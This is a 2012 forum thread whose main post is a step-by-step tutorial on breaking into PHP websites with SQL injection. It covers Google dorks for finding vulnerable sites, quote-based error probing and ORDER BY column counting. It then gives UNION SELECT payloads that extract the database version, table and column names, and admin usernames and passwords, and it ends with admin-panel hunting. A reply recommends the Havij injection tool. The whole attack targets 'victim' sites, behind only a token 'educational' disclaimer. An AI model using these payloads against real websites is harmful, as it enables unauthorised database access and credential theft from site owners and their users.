ADS: Free Browsing Cheats On One Click

>> Neco2014 Exam Answers<<


BBM: 7A99233F
HOW TO HACK PHP SITES USING SQL INJECTION
Views: 18688 | Comments: 326
Written: Oct 15, 2012



WARNING!!!
THIS TUTORIAL IS MEANT FOR
ONLY THOSE WHO HAS
KN0WLEDGE OF ETHICAL
HACKING AND FOR THOSE
THAT ARE STARTING
NEWLY, PLEASE DON'T
MISSUSE IT COS I
WOULD'NT BE
RESPONSIBLE FOR ANY
MISC0NDUCT PARTAINING
FROM WHAT U'VE LEARNT
HERE.
(HACKING IS MEANT FOR
EDUCATIONAL PURPOSE
ONLY)
LET'S GO THERE!....

TOPICS TO TALK ABOUT


1. BRIEF XPLAINATION OF
SQL, AND S0ME BASIC
QUERY C0MMANDS
ASS0CIATED WITH IT

2. FINDING VULNERABLE
SITES USING DORKS

3. CHECKING FOR
VULNEREABILITY USING
STRINGS

4. FINDING THE "NUMBER
OF C0LUMNS" IN THE
WEBSITE'S DB

5. FINDING DISPLAYING/
EXPLOITING THE
"VULNERABLE COLUMNS"
IN THE DB

6. CHECKING THE
DATABASE VERSION OF
MYSQL

7. FINDING "TABLE NAMES"
IN THE WEBSITE DB

8. FINDING C0LUMN NAMES

9. DISPLAYING THE
AVAILABLE USERNAMES,
PASSWORDS, EMAILS etc.
IN THE DATABASE

10. CRACKING OR
DECRYPTING HASHES TO
OBTAIN PASSWORDS (IF
NECCESSARY)

Tutorial Started!


=> "TUTORIAL 1"


Before we see what SQL
Injection is, i think We
should know what SQL
and Database are.

=>Database:
Database is collection of
data. In website point of
view, database is used
for storing user ids,
passwords, web page
details and more.
Some List of Database
are:

* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open
source),
* SQLite,

=>SQL:
Structured Query
Language (a type of
database). In order to
communicate with the
Database, we are using
SQL queries. We are
querying the database so
it is called as Query
language.

=> Definition from
Complete reference:
SQL is a tool for
organizing, managing,
and retrieving data
stored by a computer
database. The name
"SQL" is an abbreviation
for Structured Query
Language.For
historical reasons, SQL is
usually
pronounced"sequel," but
the alternate
pronunciation
"S.Q.L." is also used. As
the name implies, SQL is
a computer language
that you use to interact
with a database. In fact,
SQL works with one
specific type of database,
called a relational
database and it is 1 of
the world's leading
database servers that
web Administrators use

Simple Basic Queries for
SQL
:

1. SELECT e.g
"Select*from table_name" : this statement is used for
showing the content of tables including column name.
For eg: select * from users;

2. INSERT e.g Insert into table_name(column_names,...) values (corresponding values for columns):
For inserting data to
table.

For eg:
insert into users
(username,userid) values
("micheal","greyfield");
I will give more detail
and query in my next
thread about the OTHER
SQL QUERY LIKE "DELETE",
"CONCAT" etc...
Tags:
Share
0
Tweet
0
You May Also Like These Topics:
HOW TO HACK 2GO PASSWORDS WITH BLUEFTP
*NEW* How to Hack a Server [Shell Uploading, Rooting, Defacing, Covering your Tracks]
HACKING BASIS; HOW LEARN TO HACK WEBSITE
HACK A WEB SITE TODAY
Facebook Comments: []
#1 SunnEX [1278] Oct 15, 2012
=> N0W What is SQL
Injection?

SQL injection is the most Common and famous method of hacking at present . Using this method an unauthorized person(a cracker like u)
can access the database of the website. Attacker
can get all details from the Database.

What an attacker can do?

* ByPassing Logins
* Accessing secret data
* Modifying contents of
website
* Shutting down the My
SQLserver and lots of
other damages

Precisely, SQL injection is
an attack in which
malicious code is inserted
into strings that are later
passed to an instance of
SQL Server for parsing and
execution. A less direct
attack injects malicious
code into strings that are
destined for storage in a
table or as metadata.
When the stored strings
are subsequently
concatenated into a
dynamic SQL command, the
malicious code is executed.

"LESS0N TWO"

Finding Vulnerable
Website:

Our best partner for SQL
injection is Google. We
can find the Vulnerable
websites(hackable
websites) using Google
Dorklist. google dork is
searching for vulnerable
websites using the
google searching tricks.
There is lot of tricks to
search in google. But we
are going to use

"inurl:" command for
finding the vulnerable
websites.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of
Google Dork




... I ll continue soon, just let me know u are following.

Improving Waploaded Mobile Version To The Fullest
#2 Uc8mille [0] Oct 15, 2012
Yea proceed

We Love Waploaded.com With all Our Hearts
#3 geebehn [73] Oct 16, 2012
m wit u bro.

We Love Waploaded.com With all Our Hearts
#4 Passion [147] Oct 16, 2012
Ride on ma oga

We Love Waploaded.com With all Our Hearts
#5 netking [11] Oct 16, 2012
i feel yhew

We Love Waploaded.com With all Our Hearts
#6 dice629 [5] Oct 16, 2012
ride on we re wit u

We Love Waploaded.com With all Our Hearts
#7 matrosms [2] Oct 16, 2012
i am a spammer, i waz arrested by Israel32

We Love Waploaded.com With all Our Hearts
#8 Krishack [25] Oct 16, 2012
Good

this world is too small
#9 Krishack [25] Oct 16, 2012
Good

this world is too small
#10 Godwin5 [13] Oct 16, 2012
God bless u bro!

We Love Waploaded.com With all Our Hearts
#11 Murphy211 [3] Oct 16, 2012
Ride on

We Love Waploaded.com With all Our Hearts
#12 SunnEX [1278] Oct 16, 2012
Continuation:

view page 1 Here http://www.waploaded.com/tutorials/showtopic.php?currentpage=1&id=52

Here is the huge list of
Google Dork


http://www.ziddu.com/download/13161874/A...t.zip.html

"LESS0N 3"

*Checking the Vulnerability*

Now we should check the vulnerability of websites. In order to check the vulnerability,
add the single quote(') at the end of the url and hit enter. (No space between the number and single quotes)

For eg:
http://www.victimsite.com/index.php?id=2'


If the page remains in samepage or showing that page not found or showing some other webpages. Then it is not vulnerable.

BUT If it showing any errors which is related to sql query,then it is vulnerable. THATS DA CRACK!!!

For eg: u might see an error message like this below:

"You have an error in yourSQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1"

if dat happens, C0NGRATULATIONS, WE HAVE SUCCESSFULLY PASSED STAGE 1

WORK IS OVER.......N0W C0MES THE MAIN CRACKING! I HOPE U GET MA STEPS,IF NOT TELL ME NOW

*How to use*

copy one of the above
command and paste in
the google search engine
box.

Hit enter.

You can get list of web
sites.
We have to visit the
websites one by one for
checking the
vulnerability.
So Start from the first
website.

Note: if you like to hack
particular website,then
try this:

site:www.victimsite.comdork_list_commands
for eg:

site:www.victimsite.cominurl:index.php?id=


"LESS0N 4"

*Finding Numberof
columns in the Websites
Database Table*

Now we have found the
website is vulnerable.
Next step is to find the
number of columns in
the table.
For that replace the
single quote(') with
"order by n " statement.
(leave one space
between number and
order by n statement)
Change the n from
1,2,3,4,,5,6,...n. Until you
get the error like
"unknowncolumn "

For eg:
http://www.victimsite.com/index.php?id=2 order by 1

=> "no error mesage"
http://www.victimsite.com/index.php?id=2 order by 2

=> "no error mesage"
http://www.victimsite.com/index.php?id=2 order by 3

=> "no error mesage"
http://www.victimsite.com/index.php?id=2 order by 4

=> "no error mesage"
continue to change the number until you get the error as "unknown column"


SO if you get the error
while trying the "x"th
number, then no of
column is"x-1".

What i mean is this, lets say we c0ntinue
incrementing the n0
accordingly to get the
error column....,

http://www.victimsite.com/index.php?id=2 order by 7

=> "no error"
http://www.victimsite.com/index.php?id=2 order by 8

=>>> "ERROR MESAGE"
so now x=8 , THEREFORE
The number of column is
x-1 i.e, 7.

Sometime the above may
not work. SO ADD THESE
"--" at the end of the
statement.

For eg:
http://www.victimsite.com/index.php?id=2 order by 1--

[Hope no
misunderstanding yet?]


--

continue by 8pm 2moro.

Improving Waploaded Mobile Version To The Fullest
#13 kayouday [10] Oct 17, 2012
0ga sunnex ..u try sha

#14 SunnEX [1278] Oct 17, 2012
Note u can stil put (/*) or
(/--) at the end of the url as
in http://www.victimsite.com/index.php?id=2 order by 3/*
or http://www.victimsite.com/index.php?id=2 order by 3/--

Displaying d Vulnerable
columns:
Using "union select
columns_sequence " we
can find the vulnerable
part of the table. Replace
the"order by n" with this
statement. And change
the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).
For eg:

if the number of columns is 7 ,then the query is as follow:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is
not working then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2
union select
1,2,3,4,5,6,7--

It will show some
numbers inthe page(it
must be less than 'x'
value, i mean less than or equal to number of columns).
Like this:

Now select 1 number.
It showing 3,7. Let's take the Number 3.

Step 5: Finding
version,database,user
Now replace the 3 from the query with "version()
"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version()
,4,5,6,7--

It will show the version as 5.0.1 or 4.3. something like this.
Replace the version()
with database() and user () for finding the
database, user respectively.

For eg: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database
(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user()
,4,5,6,7--
If the above is not
working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex (hex(@@version))
,4,5,6,7--

Finding the Table Name if the version is 5 or above. Then follow these steps.
Now we have to findthe table name of the database. Replace the 3 with "group_concat
(table_name) and add
the "from information_schema.tables where table_schema=database()"
For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name) ,4,5,6,7 from information_schema.tables where table_schema=database()--
Now it will show the
list of table names. Find the table name which is related with the admin or user.

Now select the
"admin"table if the
version is 4 or some
others, you have to guess the table names.(user,tbluser). It is hard and bore to do sql inection with version 4.Finding the Column Name Now replace the"group_concat
(table_name) with
the"group_concat
(column_name)"Replace the"from information_schema.tables where table_schema=database()--"with"FROM
information_schema.columns WHERE table_name=mysqlchar--

Now read carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that.
Find MysqlChar() for
Tablename: First of all
install the HackBar
addon:

https://addons.mozilla.org/en-US/firefox/addon/3899/

Now select sql->Mysql-
>MysqlChar() This will
open the small window,enter the table name which you found.i am going to use the admin tablename. Click ok.

Now you can see the
CHAR(numbers separated with commas) in the Hack toolbar Downloaded previously.Copy and paste the code at the end of the url instead of the "mysqlchar"

For eg: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97,100, 109, 105, 110)--

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace the replace group_concat(column_name) with group_concat(columnname ,0x3a,anothercolumnname ).
Columnname should be replaced from the listed column name.
anothercolumnname
should be replace from the listed column name.



Now replace the " from information_schema.columns where table_name=CHAR(97,100, 109,105, 110)"with the "from table_name"

For eg: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.
Then try another column names
Now it will bring
Username and
passwords.
NOW If the website has members then Woopiee!! for you.
You will have the list of usernames and
password.Some time you may have the email ids also,enjoy
you got the Duck whichcan produce the goldeneggs.

Step 8: Finding the
Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php

http://www.victimsite.com/admin/

http://www.victimsite.com/admin.html

http://www.victimsite.com:2082/
etc.

If you have luck, you will find the admin page using above urls. or try this list .

Here is the list of admin
urls:

[url]http://www.ziddu.com/download/13163866/A...t.zip.html[/lurl]

tutorial Completed!..

Improving Waploaded Mobile Version To The Fullest
#15 Mbosinwa [15] Oct 20, 2012
Addition to step 8:
You can easily search for your victim cpanel by downloading a powerful sql injector tool.. HAVIJ

We Love Waploaded.com With all Our Hearts
1 Next >>
If You Post Links or Phone number, You would be Banned From accessing this site

Comment



Content Removal
Advertise here
About Us
Privacy Policy
Disclaimer
Contact Us
Terms
Powered By: Fidelis SunnEX | Developed: E. B. Analike